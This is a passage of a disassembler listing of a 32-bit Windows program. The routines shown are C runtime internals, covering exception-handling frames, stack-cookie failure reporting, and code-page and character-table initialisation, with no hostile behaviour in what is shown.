		lea	eax, [ecx-2]
		mov	ecx, [esp+arg_0]
		sub	eax, ecx
		retn
; ---------------------------------------------------------------------------

loc_404767:				; CODE XREF: sub_4046F0+51j
		lea	eax, [ecx-3]
		mov	ecx, [esp+arg_0]
		sub	eax, ecx
		retn
; ---------------------------------------------------------------------------

loc_404771:				; CODE XREF: sub_4046F0+4Dj
		lea	eax, [ecx-4]
		mov	ecx, [esp+arg_0]
		sub	eax, ecx
		retn
sub_4046F0	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40477B	proc near		; CODE XREF: sub_40121E+58p
					; sub_40150F+Fp ...

var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 20h
		mov	eax, [ebp+arg_0]
		push	esi
		push	edi
		push	8
		pop	ecx
		mov	esi, offset dword_41E3F8
		lea	edi, [ebp+var_20]
		rep movsd
		mov	[ebp+var_8], eax
		mov	eax, [ebp+arg_4]
		test	eax, eax
		pop	edi
		mov	[ebp+var_4], eax
		pop	esi
		jz	short loc_4047AE
		test	byte ptr [eax],	8
		jz	short loc_4047AE
		mov	[ebp+var_C], 1994000h

loc_4047AE:				; CODE XREF: sub_40477B+25j
					; sub_40477B+2Aj
		lea	eax, [ebp+var_C]
		push	eax
		push	[ebp+var_10]
		push	[ebp+var_1C]
		push	[ebp+var_20]
		call	ds:off_41E1AC
		leave
		retn	8
sub_40477B	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4047C5	proc near		; CODE XREF: sub_40BE69+65p

var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		push	ecx
		push	ebx
		mov	eax, [ebp+arg_4]
		add	eax, 0Ch
		mov	[ebp+var_4], eax
		mov	ebx, large fs:0
		mov	eax, [ebx]
		mov	large fs:0, eax
		mov	eax, [ebp+arg_0]
		mov	ebx, [ebp+arg_4]
		mov	ebp, [ebp+var_4]
		mov	esp, [ebx-4]
		jmp	eax
sub_4047C5	endp

; ---------------------------------------------------------------------------
		pop	ebx
		leave
		retn	8

; =============== S U B	R O U T	I N E =======================================



sub_4047F5	proc near		; CODE XREF: sub_40B982+31p
					; sub_40BDD8+59p ...

arg_4		= dword	ptr  8

		pop	eax
		pop	ecx
		xchg	eax, [esp-8+arg_4]
		jmp	eax
sub_4047F5	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4047FC	proc near		; CODE XREF: sub_404989+69p
					; sub_40BE69:loc_40BE91p ...

var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		push	ecx
		push	ecx
		push	ebx
		push	esi
		push	edi
		mov	esi, large fs:0
		mov	[ebp+var_4], esi
		mov	[ebp+var_8], offset loc_404825
		push	0
		push	[ebp+arg_4]
		push	[ebp+var_8]
		push	[ebp+arg_0]
		call	sub_413F36

loc_404825:				; DATA XREF: sub_4047FC+12o
		mov	eax, [ebp+arg_4]
		mov	eax, [eax+4]
		and	eax, 0FFFFFFFDh
		mov	ecx, [ebp+arg_4]
		mov	[ecx+4], eax
		mov	edi, large fs:0
		mov	ebx, [ebp+var_4]
		mov	[ebx], edi
		mov	large fs:0, ebx
		pop	edi
		pop	esi
		pop	ebx
		leave
		retn	8
sub_4047FC	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40484E	proc near		; CODE XREF: .text:0041CDA9j
					; .text:0041CDC4j ...

var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h

		push	ebp
		mov	ebp, esp
		sub	esp, 8
		push	ebx
		push	esi
		push	edi
		cld
		mov	[ebp+var_4], eax
		xor	eax, eax
		push	eax
		push	eax
		push	eax
		push	[ebp+var_4]
		push	[ebp+arg_C]
		push	[ebp+arg_8]
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		call	sub_40C335
		add	esp, 20h
		mov	[ebp+var_8], eax
		pop	edi
		pop	esi
		pop	ebx
		mov	eax, [ebp+var_8]
		mov	esp, ebp
		pop	ebp
		retn
sub_40484E	endp

; ---------------------------------------------------------------------------

loc_404884:				; DATA XREF: sub_404B2E+24o
		push	esi
		cld
		mov	esi, [esp+0Ch]
		mov	ecx, [esi+8]
		xor	ecx, esi
		call	sub_402C9E
		push	0
		push	esi
		push	dword ptr [esi+14h]
		push	dword ptr [esi+0Ch]
		push	0
		push	dword ptr [esp+24h]
		push	dword ptr [esi+10h]
		push	dword ptr [esp+24h]
		call	sub_40C335
		add	esp, 20h
		pop	esi
		retn

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4048B4	proc near		; CODE XREF: sub_404989+81p
					; sub_40BED5+53p

var_38		= dword	ptr -38h
var_34		= dword	ptr -34h
var_30		= dword	ptr -30h
var_2C		= dword	ptr -2Ch
var_28		= dword	ptr -28h
var_24		= dword	ptr -24h
var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
var_18		= dword	ptr -18h
var_14		= dword	ptr -14h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_10		= dword	ptr  18h
arg_14		= dword	ptr  1Ch
arg_18		= dword	ptr  20h

		push	ebp
		mov	ebp, esp
		sub	esp, 38h
		push	ebx
		cmp	[ebp+arg_0], 123h
		jnz	short loc_4048D6
		mov	eax, offset loc_40495D
		mov	ecx, [ebp+arg_4]
		mov	[ecx], eax
		xor	eax, eax
		inc	eax
		jmp	loc_404986
; ---------------------------------------------------------------------------

loc_4048D6:				; CODE XREF: sub_4048B4+Ej
		and	[ebp+var_28], 0
		mov	[ebp+var_24], offset sub_404989
		mov	eax, dword_424064
		lea	ecx, [ebp+var_28]
		xor	eax, ecx
		mov	[ebp+var_20], eax
		mov	eax, [ebp+arg_10]
		mov	[ebp+var_1C], eax
		mov	eax, [ebp+arg_4]
		mov	[ebp+var_18], eax
		mov	eax, [ebp+arg_14]
		mov	[ebp+var_14], eax
		mov	eax, [ebp+arg_18]
		mov	[ebp+var_10], eax
		and	[ebp+var_C], 0
		and	[ebp+var_8], 0
		and	[ebp+var_4], 0
		mov	[ebp+var_C], esp
		mov	[ebp+var_8], ebp
		mov	eax, large fs:0
		mov	[ebp+var_28], eax
		lea	eax, [ebp+var_28]
		mov	large fs:0, eax
		mov	[ebp+var_38], 1
		mov	eax, [ebp+arg_0]
		mov	[ebp+var_34], eax
		mov	eax, [ebp+arg_8]
		mov	[ebp+var_30], eax
		call	sub_40595D
		mov	eax, [eax+80h]
		mov	[ebp+var_2C], eax
		lea	eax, [ebp+var_34]
		push	eax
		mov	eax, [ebp+arg_0]
		push	dword ptr [eax]
		call	[ebp+var_2C]
		pop	ecx
		pop	ecx
		and	[ebp+var_38], 0

loc_40495D:				; DATA XREF: sub_4048B4+10o
		cmp	[ebp+var_4], 0
		jz	short loc_40497A
		mov	ebx, large fs:0
		mov	eax, [ebx]
		mov	ebx, [ebp+var_28]
		mov	[ebx], eax
		mov	large fs:0, ebx
		jmp	short loc_404983
; ---------------------------------------------------------------------------

loc_40497A:				; CODE XREF: sub_4048B4+ADj
		mov	eax, [ebp+var_28]
		mov	large fs:0, eax

loc_404983:				; CODE XREF: sub_4048B4+C4j
		mov	eax, [ebp+var_38]

loc_404986:				; CODE XREF: sub_4048B4+1Dj
		pop	ebx
		leave
		retn
sub_4048B4	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_404989	proc near		; DATA XREF: sub_4048B4+26o

var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		push	ecx
		push	ebx
		cld
		mov	eax, [ebp+arg_4]
		mov	ecx, [eax+8]
		xor	ecx, [ebp+arg_4]
		call	sub_402C9E
		mov	eax, [ebp+arg_0]
		mov	eax, [eax+4]
		and	eax, 66h
		jz	short loc_4049B9
		mov	eax, [ebp+arg_4]
		mov	dword ptr [eax+24h], 1
		xor	eax, eax
		inc	eax
		jmp	short loc_404A23
; ---------------------------------------------------------------------------
		jmp	short loc_404A23
; ---------------------------------------------------------------------------

loc_4049B9:				; CODE XREF: sub_404989+1Dj
		push	1
		mov	eax, [ebp+arg_4]
		push	dword ptr [eax+18h]
		mov	eax, [ebp+arg_4]
		push	dword ptr [eax+14h]
		mov	eax, [ebp+arg_4]
		push	dword ptr [eax+0Ch]
		push	0
		push	[ebp+arg_8]
		mov	eax, [ebp+arg_4]
		push	dword ptr [eax+10h]
		push	[ebp+arg_0]
		call	sub_40C335
		add	esp, 20h
		mov	eax, [ebp+arg_4]
		cmp	dword ptr [eax+24h], 0
		jnz	short loc_4049F7
		push	[ebp+arg_0]
		push	[ebp+arg_4]
		call	sub_4047FC

loc_4049F7:				; CODE XREF: sub_404989+61j
		push	0
		push	0
		push	0
		push	0
		push	0
		lea	eax, [ebp+var_4]
		push	eax
		push	123h
		call	sub_4048B4
		add	esp, 1Ch
		mov	eax, [ebp+var_4]
		mov	ebx, [ebp+arg_4]
		mov	esp, [ebx+1Ch]
		mov	ebp, [ebx+20h]
		jmp	eax
; ---------------------------------------------------------------------------
		xor	eax, eax
		inc	eax

loc_404A23:				; CODE XREF: sub_404989+2Cj
					; sub_404989+2Ej
		pop	ebx
		leave
		retn
sub_404989	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_404A26	proc near		; CODE XREF: sub_40BED5+81p
					; sub_40BFC7+1C6p

var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h

		push	ebp
		mov	ebp, esp
		push	ecx
		push	ebx
		push	esi
		push	edi
		mov	edi, [ebp+arg_0]
		mov	eax, [edi+10h]
		mov	esi, [edi+0Ch]
		mov	[ebp+var_4], eax
		mov	ebx, esi
		jmp	short loc_404A6A
; ---------------------------------------------------------------------------

loc_404A3D:				; CODE XREF: sub_404A26+4Bj
		cmp	esi, 0FFFFFFFFh
		jnz	short loc_404A47
		call	sub_40C465

loc_404A47:				; CODE XREF: sub_404A26+1Aj
		mov	ecx, [ebp+var_4]
		dec	esi
		mov	eax, esi
		imul	eax, 14h
		add	eax, ecx
		mov	ecx, [ebp+arg_8]
		cmp	[eax+4], ecx
		jge	short loc_404A5F
		cmp	ecx, [eax+8]
		jle	short loc_404A64

loc_404A5F:				; CODE XREF: sub_404A26+32j
		cmp	esi, 0FFFFFFFFh
		jnz	short loc_404A6D

loc_404A64:				; CODE XREF: sub_404A26+37j
		dec	[ebp+arg_4]
		mov	ebx, [ebp+arg_0]

loc_404A6A:				; CODE XREF: sub_404A26+15j
		mov	[ebp+arg_0], esi

loc_404A6D:				; CODE XREF: sub_404A26+3Cj
		cmp	[ebp+arg_4], 0
		jge	short loc_404A3D
		mov	eax, [ebp+arg_C]
		inc	esi
		mov	[eax], esi
		mov	eax, [ebp+arg_10]
		mov	[eax], ebx
		cmp	ebx, [edi+0Ch]
		ja	short loc_404A87
		cmp	esi, ebx
		jbe	short loc_404A8C

loc_404A87:				; CODE XREF: sub_404A26+5Bj
		call	sub_40C465

loc_404A8C:				; CODE XREF: sub_404A26+5Fj
		mov	eax, esi
		imul	eax, 14h
		add	eax, [ebp+var_4]
		pop	edi
		pop	esi
		pop	ebx
		leave
		retn
sub_404A26	endp


; =============== S U B	R O U T	I N E =======================================



sub_404A99	proc near		; CODE XREF: sub_40BABD+28p

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

		mov	eax, [esp+arg_4]
		push	esi
		mov	esi, [esp+4+arg_0]
		mov	[esi], eax
		call	sub_40595D
		mov	eax, [eax+98h]
		mov	[esi+4], eax
		call	sub_40595D
		mov	[eax+98h], esi
		mov	eax, esi
		pop	esi
		retn
sub_404A99	endp


; =============== S U B	R O U T	I N E =======================================



sub_404AC1	proc near		; CODE XREF: sub_40BBE3+60p

arg_0		= dword	ptr  4

		call	sub_40595D
		mov	eax, [eax+98h]
		jmp	short loc_404AD9
; ---------------------------------------------------------------------------

loc_404ACE:				; CODE XREF: sub_404AC1+1Aj
		mov	ecx, [eax]
		cmp	ecx, [esp+arg_0]
		jz	short loc_404ADF
		mov	eax, [eax+4]

loc_404AD9:				; CODE XREF: sub_404AC1+Bj
		test	eax, eax
		jnz	short loc_404ACE
		inc	eax
		retn
; ---------------------------------------------------------------------------

loc_404ADF:				; CODE XREF: sub_404AC1+13j
		xor	eax, eax
		retn
sub_404AC1	endp


; =============== S U B	R O U T	I N E =======================================



sub_404AE2	proc near		; CODE XREF: sub_40BBE3+9p

arg_0		= dword	ptr  4

		push	esi
		call	sub_40595D
		mov	esi, [esp+4+arg_0]
		cmp	esi, [eax+98h]
		jnz	short loc_404B04
		call	sub_40595D
		mov	ecx, [esi+4]
		mov	[eax+98h], ecx
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_404B04:				; CODE XREF: sub_404AE2+10j
		call	sub_40595D
		mov	eax, [eax+98h]
		jmp	short loc_404B1A
; ---------------------------------------------------------------------------

loc_404B11:				; CODE XREF: sub_404AE2+3Cj
		mov	ecx, [eax+4]
		cmp	esi, ecx
		jz	short loc_404B26
		mov	eax, ecx

loc_404B1A:				; CODE XREF: sub_404AE2+2Dj
		cmp	dword ptr [eax+4], 0
		jnz	short loc_404B11
		pop	esi
		jmp	sub_40C465
; ---------------------------------------------------------------------------

loc_404B26:				; CODE XREF: sub_404AE2+34j
		mov	ecx, [esi+4]
		mov	[eax+4], ecx
		pop	esi
		retn
sub_404AE2	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_404B2E	proc near		; CODE XREF: sub_40BABD+7Fp

var_18		= dword	ptr -18h
var_14		= dword	ptr -14h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h

		push	ebp
		mov	ebp, esp
		sub	esp, 18h
		mov	eax, dword_424064
		and	[ebp+var_18], 0
		lea	ecx, [ebp+var_18]
		xor	eax, ecx
		mov	ecx, [ebp+arg_0]
		mov	[ebp+var_10], eax
		mov	eax, [ebp+arg_4]
		mov	[ebp+var_C], eax
		mov	eax, [ebp+arg_C]
		inc	eax
		mov	[ebp+var_14], offset loc_404884
		mov	[ebp+var_8], ecx
		mov	[ebp+var_4], eax
		mov	eax, large fs:0
		mov	[ebp+var_18], eax
		lea	eax, [ebp+var_18]
		mov	large fs:0, eax
		push	[ebp+arg_10]
		push	ecx
		push	[ebp+arg_8]
		call	sub_40C4B0
		mov	ecx, eax
		mov	eax, [ebp+var_18]
		mov	large fs:0, eax
		mov	eax, ecx
		leave
		retn
sub_404B2E	endp


; =============== S U B	R O U T	I N E =======================================



sub_404B8C	proc near		; CODE XREF: sub_401065+7p
					; sub_40121E+7p ...

arg_0		= byte ptr  4

		push	eax
		push	large dword ptr	fs:0
		lea	eax, [esp+8+arg_0]
		sub	esp, [esp+0Ch]
		push	ebx
		push	esi
		push	edi
		mov	[eax], ebp
		mov	ebp, eax
		mov	eax, dword_424064
		xor	eax, ebp
		push	eax
		push	dword ptr [ebp-4]
		mov	dword ptr [ebp-4], 0FFFFFFFFh
		lea	eax, [ebp-0Ch]
		mov	large fs:0, eax
		retn
sub_404B8C	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_404BBF	proc near		; CODE XREF: sub_401442+7p
					; sub_40BA74+7p

arg_0		= byte ptr  4

		push	eax
		push	large dword ptr	fs:0
		lea	eax, [esp+8+arg_0]
		sub	esp, [esp+0Ch]
		push	ebx
		push	esi
		push	edi
		mov	[eax], ebp
		mov	ebp, eax
		mov	eax, dword_424064
		xor	eax, ebp
		push	eax
		mov	[ebp-10h], esp
		push	dword ptr [ebp-4]
		mov	dword ptr [ebp-4], 0FFFFFFFFh
		lea	eax, [ebp-0Ch]
		mov	large fs:0, eax
		retn
sub_404BBF	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_404BF5	proc near		; CODE XREF: sub_40177B:loc_401785p
					; sub_4019F3+Ap ...

arg_0		= byte ptr  4

		push	eax
		push	large dword ptr	fs:0
		lea	eax, [esp+8+arg_0]
		sub	esp, [esp+0Ch]
		push	ebx
		push	esi
		push	edi
		mov	[eax], ebp
		mov	ebp, eax
		mov	eax, dword_424064
		xor	eax, ebp
		push	eax
		mov	[ebp-10h], eax
		push	dword ptr [ebp-4]
		mov	dword ptr [ebp-4], 0FFFFFFFFh
		lea	eax, [ebp-0Ch]
		mov	large fs:0, eax
		retn
sub_404BF5	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_404C2B	proc near		; CODE XREF: sub_401065+2Dp
					; sub_40121E+6Bp ...
		mov	ecx, [ebp-0Ch]
		mov	large fs:0, ecx
		pop	ecx
		pop	edi
		pop	edi
		pop	esi
		pop	ebx
		mov	esp, ebp
		pop	ebp
		push	ecx
		retn
sub_404C2B	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_404C3F	proc near		; CODE XREF: sub_40177B:loc_4019EBp
					; sub_4019F3:loc_401C15p ...
		mov	ecx, [ebp-10h]
		xor	ecx, ebp
		call	sub_402C9E
		jmp	sub_404C2B
sub_404C3F	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_404C4E	proc near		; CODE XREF: sub_402C9E:loc_402CA8j

var_328		= dword	ptr -328h
var_324		= dword	ptr -324h
var_320		= dword	ptr -320h
arg_0		= byte ptr  8

		push	ebp
		mov	ebp, esp
		sub	esp, 328h
		mov	dword_427F08, eax
		mov	dword_427F04, ecx
		mov	dword_427F00, edx
		mov	dword_427EFC, ebx
		mov	dword_427EF8, esi
		mov	dword_427EF4, edi
		mov	word_427F20, ss
		mov	word_427F14, cs
		mov	word_427EF0, ds
		mov	word_427EEC, es
		mov	word_427EE8, fs
		mov	word_427EE4, gs
		pushf
		pop	dword_427F18
		mov	eax, [ebp+0]
		mov	dword_427F0C, eax
		mov	eax, [ebp+4]
		mov	dword_427F10, eax
		lea	eax, [ebp+arg_0]
		mov	dword_427F1C, eax
		mov	eax, [ebp+var_320]
		mov	dword_427E58, 10001h
		mov	eax, dword_427F10
		mov	dword_427E0C, eax
		mov	dword_427E00, 0C0000409h
		mov	dword_427E04, 1
		mov	eax, dword_424064
		mov	[ebp+var_328], eax
		mov	eax, dword_424068
		mov	[ebp+var_324], eax
		call	ds:off_41E08C
		mov	dword_427E50, eax
		push	1
		call	sub_408125
		pop	ecx
		push	0
		call	ds:dword_41E19C	; SetUnhandledExceptionFilter
		push	offset off_41E418
		call	ds:off_41E198
		cmp	dword_427E50, 0
		jnz	short loc_404D3E
		push	1
		call	sub_408125
		pop	ecx

loc_404D3E:				; CODE XREF: sub_404C4E+E6j
		push	0C0000409h
		call	ds:dword_41E0C8	; GetCurrentProcess
		push	eax
		call	ds:off_41E0F4
		leave
		retn
sub_404C4E	endp


; =============== S U B	R O U T	I N E =======================================



sub_404D52	proc near		; CODE XREF: sub_40507E+11Ep
					; sub_40507E+173p
		sub	eax, 3A4h
		jz	short loc_404D7B
		sub	eax, 4
		jz	short loc_404D75
		sub	eax, 0Dh
		jz	short loc_404D6F
		dec	eax
		jz	short loc_404D69
		xor	eax, eax
		retn
; ---------------------------------------------------------------------------

loc_404D69:				; CODE XREF: sub_404D52+12j
		mov	eax, 404h
		retn
; ---------------------------------------------------------------------------

loc_404D6F:				; CODE XREF: sub_404D52+Fj
		mov	eax, 412h
		retn
; ---------------------------------------------------------------------------

loc_404D75:				; CODE XREF: sub_404D52+Aj
		mov	eax, 804h
		retn
; ---------------------------------------------------------------------------

loc_404D7B:				; CODE XREF: sub_404D52+5j
		mov	eax, 411h
		retn
sub_404D52	endp


; =============== S U B	R O U T	I N E =======================================



sub_404D81	proc near		; CODE XREF: sub_40507E+2Bp
		push	ebx
		push	ebp
		push	esi
		push	edi
		mov	ebp, 101h
		mov	esi, eax
		push	ebp
		xor	edi, edi
		lea	ebx, [esi+1Ch]
		push	edi
		push	ebx
		call	sub_408130
		mov	[esi+4], edi
		mov	[esi+8], edi
		mov	[esi+0Ch], edi
		xor	eax, eax
		lea	edi, [esi+10h]
		stosd
		stosd
		stosd
		mov	eax, offset dword_424070
		add	esp, 0Ch
		sub	eax, esi

loc_404DB4:				; CODE XREF: sub_404D81+3Aj
		mov	cl, [eax+ebx]
		mov	[ebx], cl
		inc	ebx
		dec	ebp
		jnz	short loc_404DB4
		lea	ecx, [esi+11Dh]
		mov	esi, 100h

loc_404DC8:				; CODE XREF: sub_404D81+4Ej
		mov	dl, [ecx+eax]
		mov	[ecx], dl
		inc	ecx
		dec	esi
		jnz	short loc_404DC8
		pop	edi
		pop	esi
		pop	ebp
		pop	ebx
		retn
sub_404D81	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame fpd=49Ch


sub_404DD6	proc near		; CODE XREF: sub_40507E+141p

var_51C		= dword	ptr -51Ch
var_518		= byte ptr -518h
var_512		= byte ptr -512h
var_511		= byte ptr -511h
var_504		= word ptr -504h
var_304		= byte ptr -304h
var_204		= byte ptr -204h
var_104		= byte ptr -104h
var_4		= dword	ptr -4

		push	ebp
		lea	ebp, [esp-49Ch]
		sub	esp, 51Ch
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+49Ch+var_4], eax
		push	ebx
		push	edi
		lea	eax, [ebp+49Ch+var_518]
		push	eax
		push	dword ptr [esi+4]
		call	ds:dword_41E1B4	; GetCPInfo
		test	eax, eax
		mov	edi, 100h
		jz	loc_404EFC
		xor	eax, eax

loc_404E0F:				; CODE XREF: sub_404DD6+43j
		mov	[ebp+eax+49Ch+var_104],	al
		inc	eax
		cmp	eax, edi
		jb	short loc_404E0F
		mov	al, [ebp+49Ch+var_512]
		test	al, al
		mov	[ebp+49Ch+var_104], 20h
		jz	short loc_404E54
		lea	ebx, [ebp+49Ch+var_511]

loc_404E2C:				; CODE XREF: sub_404DD6+7Cj
		movzx	ecx, al
		movzx	eax, byte ptr [ebx]
		cmp	ecx, eax
		ja	short loc_404E4C
		sub	eax, ecx
		inc	eax
		push	eax
		lea	edx, [ebp+ecx+49Ch+var_104]
		push	20h
		push	edx
		call	sub_408130
		add	esp, 0Ch

loc_404E4C:				; CODE XREF: sub_404DD6+5Ej
		inc	ebx
		mov	al, [ebx]
		inc	ebx
		test	al, al
		jnz	short loc_404E2C

loc_404E54:				; CODE XREF: sub_404DD6+51j
		push	0
		push	dword ptr [esi+0Ch]
		lea	eax, [ebp+49Ch+var_504]
		push	dword ptr [esi+4]
		push	eax
		push	edi
		lea	eax, [ebp+49Ch+var_104]
		push	eax
		push	1
		push	0
		call	sub_40CAB4
		xor	ebx, ebx
		push	ebx
		push	dword ptr [esi+4]
		lea	eax, [ebp+49Ch+var_204]
		push	edi
		push	eax
		push	edi
		lea	eax, [ebp+49Ch+var_104]
		push	eax
		push	edi
		push	dword ptr [esi+0Ch]
		push	ebx
		call	sub_40C8B9
		add	esp, 44h
		push	ebx
		push	dword ptr [esi+4]
		lea	eax, [ebp+49Ch+var_304]
		push	edi
		push	eax
		push	edi
		lea	eax, [ebp+49Ch+var_104]
		push	eax
		push	200h
		push	dword ptr [esi+0Ch]
		push	ebx
		call	sub_40C8B9
		add	esp, 24h
		xor	eax, eax

loc_404EBB:				; CODE XREF: sub_404DD6+122j
		movzx	ecx, [ebp+eax*2+49Ch+var_504]
		test	cl, 1
		jz	short loc_404ED3
		or	byte ptr [esi+eax+1Dh],	10h
		mov	cl, [ebp+eax+49Ch+var_204]
		jmp	short loc_404EE4
; ---------------------------------------------------------------------------

loc_404ED3:				; CODE XREF: sub_404DD6+EDj
		test	cl, 2
		jz	short loc_404EED
		or	byte ptr [esi+eax+1Dh],	20h
		mov	cl, [ebp+eax+49Ch+var_304]

loc_404EE4:				; CODE XREF: sub_404DD6+FBj
		mov	[esi+eax+11Dh],	cl
		jmp	short loc_404EF5
; ---------------------------------------------------------------------------

loc_404EED:				; CODE XREF: sub_404DD6+100j
		mov	byte ptr [esi+eax+11Dh], 0

loc_404EF5:				; CODE XREF: sub_404DD6+115j
		inc	eax
		cmp	eax, edi
		jb	short loc_404EBB
		jmp	short loc_404F49
; ---------------------------------------------------------------------------

loc_404EFC:				; CODE XREF: sub_404DD6+31j
		lea	eax, [esi+11Dh]
		mov	[ebp+49Ch+var_51C], 0FFFFFF9Fh
		xor	ecx, ecx
		sub	[ebp+49Ch+var_51C], eax

loc_404F0E:				; CODE XREF: sub_404DD6+171j
		mov	edx, [ebp+49Ch+var_51C]
		lea	eax, [esi+ecx+11Dh]
		add	edx, eax
		lea	ebx, [edx+20h]
		cmp	ebx, 19h
		ja	short loc_404F2E
		or	byte ptr [esi+ecx+1Dh],	10h
		mov	dl, cl
		add	dl, 20h
		jmp	short loc_404F3D
; ---------------------------------------------------------------------------

loc_404F2E:				; CODE XREF: sub_404DD6+14Aj
		cmp	edx, 19h
		ja	short loc_404F41
		or	byte ptr [esi+ecx+1Dh],	20h
		mov	dl, cl
		sub	dl, 20h

loc_404F3D:				; CODE XREF: sub_404DD6+156j
		mov	[eax], dl
		jmp	short loc_404F44
; ---------------------------------------------------------------------------

loc_404F41:				; CODE XREF: sub_404DD6+15Bj
		mov	byte ptr [eax],	0

loc_404F44:				; CODE XREF: sub_404DD6+169j
		inc	ecx
		cmp	ecx, edi
		jb	short loc_404F0E

loc_404F49:				; CODE XREF: sub_404DD6+124j
		mov	ecx, [ebp+49Ch+var_4]
		pop	edi
		xor	ecx, ebp
		pop	ebx
		call	sub_402C9E
		add	ebp, 49Ch
		leave
		retn
sub_404DD6	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_404F60	proc near		; CODE XREF: sub_402CAD+57p
					; sub_405229+1Ap

var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h

		push	0Ch
		push	offset dword_4229A0
		call	__SEH_prolog4
		call	sub_40595D
		mov	edi, eax
		mov	eax, dword_424594
		test	[edi+70h], eax
		jz	short loc_404F9A
		cmp	dword ptr [edi+6Ch], 0
		jz	short loc_404F9A
		mov	esi, [edi+68h]

loc_404F86:				; CODE XREF: sub_404F60+96j
		test	esi, esi
		jnz	short loc_404F92
		push	20h
		call	sub_407E1D
		pop	ecx

loc_404F92:				; CODE XREF: sub_404F60+28j
		mov	eax, esi
		call	__SEH_epilog4
		retn
; ---------------------------------------------------------------------------

loc_404F9A:				; CODE XREF: sub_404F60+1Bj
					; sub_404F60+21j
		push	0Dh
		call	sub_405FB7
		pop	ecx
		and	[ebp+ms_exc.disabled], 0
		mov	esi, [edi+68h]
		mov	[ebp+var_1C], esi
		cmp	esi, dword_424498
		jz	short loc_404FEA
		test	esi, esi
		jz	short loc_404FD2
		push	esi
		call	ds:dword_41E18C	; InterlockedDecrement
		test	eax, eax
		jnz	short loc_404FD2
		cmp	esi, offset dword_424070
		jz	short loc_404FD2
		push	esi
		call	sub_403B91
		pop	ecx

loc_404FD2:				; CODE XREF: sub_404F60+56j
					; sub_404F60+61j ...
		mov	eax, dword_424498
		mov	[edi+68h], eax
		mov	esi, dword_424498
		mov	[ebp+var_1C], esi
		push	esi
		call	ds:dword_41E1B8	; InterlockedIncrement

loc_404FEA:				; CODE XREF: sub_404F60+52j
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_404FFB
		jmp	short loc_404F86
sub_404F60	endp


; =============== S U B	R O U T	I N E =======================================



sub_404FF8	proc near		; DATA XREF: jlrllt49:004229B8o
		mov	esi, [ebp-1Ch]
sub_404FF8	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_404FFB	proc near		; CODE XREF: sub_404F60+91p
		push	0Dh
		call	sub_405EDF
		pop	ecx
		retn
sub_404FFB	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_405004	proc near		; CODE XREF: sub_40507E+19p
					; sub_405229+25p

var_10		= dword	ptr -10h
var_8		= dword	ptr -8
var_4		= byte ptr -4

		push	ebp
		mov	ebp, esp
		sub	esp, 10h
		push	ebx
		xor	ebx, ebx
		push	ebx
		lea	ecx, [ebp+var_10]
		call	sub_402CAD
		cmp	esi, 0FFFFFFFEh
		mov	dword_428124, ebx
		jnz	short loc_40503F
		mov	dword_428124, 1
		call	ds:off_41E184

loc_405031:				; CODE XREF: sub_405004+50j
					; sub_405004+67j
		cmp	[ebp+var_4], bl
		jz	short loc_40507B
		mov	ecx, [ebp+var_8]
		and	dword ptr [ecx+70h], 0FFFFFFFDh
		jmp	short loc_40507B
; ---------------------------------------------------------------------------

loc_40503F:				; CODE XREF: sub_405004+1Bj
		cmp	esi, 0FFFFFFFDh
		jnz	short loc_405056
		mov	dword_428124, 1
		call	ds:dword_41E188	; GetACP
		jmp	short loc_405031
; ---------------------------------------------------------------------------

loc_405056:				; CODE XREF: sub_405004+3Ej
		cmp	esi, 0FFFFFFFCh
